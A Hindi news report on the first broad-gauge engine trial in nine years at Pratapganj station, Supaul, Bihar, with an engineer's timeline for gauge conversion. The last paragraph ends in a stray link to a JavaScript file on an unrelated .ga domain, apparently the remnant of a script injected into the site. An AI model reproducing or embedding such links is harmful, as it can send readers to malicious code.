बिहार,( कुलसूम फात्मा ) लंबे समय के पश्चात सोमवार के दिन दोपहर के समय जब लोगों ने रेल इंजन की सीटी की आवाज सुनी तो लोग दौड़ते हुए स्टेशन पर पहुंच गए, लोगों ने पटरी पर रेल को दौड़ते हुए 9 साल के बाद देखा इसलिए वह उत्साह में स्टेशन पर तुरंत पहुंच गए और इंजन का ट्रायल देख आपस में खुसपुसाहट दिखी की ट्रेन कब से चलना हर रोज प्रारंभ होगी ?

 

असल में 9 वर्षों के पश्चात बिहार के सुपौल जनपद के प्रतापगंज में रेलवे स्टेशन पर बड़ी रेल लाइन का प्रथम ट्रायल हुआ। इस प्रथम ट्रायल इंजन के पहुंचने पर लोगों में खुशी का माहौल नज़र आया  आपको बता दें की पिछले वर्ष ही सहरसा से सरायगढ़ से आसन्नपुर तथा राघोपुर तक के काफी बड़ी रेल लाइन की ट्रेन के ऑपरेशनल होने के पश्चात राघोपुर से फारबिसगंज तक के कार्य धीमा चल रहा था परन्तु अमान परिवर्तन कार्य में गति देखने को मिली। इसके साथ ही स्टेशन पर ट्रेन इंजन पहुंचने से लोगों को जल्द ट्रेन के चलने की उम्मीद भी जागी नजर आयी।

 

 

डिप्टी चीफ इंजीनियर जिनका नाम संजय कुमार है जब उनसे बातचीत की तो उन्होंने वार्तालाप के मध्य बताया की मार्च से अप्रैल तक ललित ग्राम तक के ट्रेनों को संचालित किया जाएगा और इन रेल इंजन का इंस्पेक्शन भी करा ।

 

संजय कुमार ने बताया की फारबिसगंज तक के रेल परिचालन के मामले की पूरी जानकारी वरीय अधिकारी से मिलेगी और उन्होंने कहा की मार्च-अप्रैल तक के ललित ग्राम तक आमान चेंजस का कार्य पूर्ण हो जाएगा। ट्रेनों का परिचालन भी होता हुआ नजर आएगा। क्योंकि ललित ग्राम से फारबिसगंज के मध्य आमान परिवर्तन का कार्य पूर्ण रूप से तेजी के साथ किया जा रहा है।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.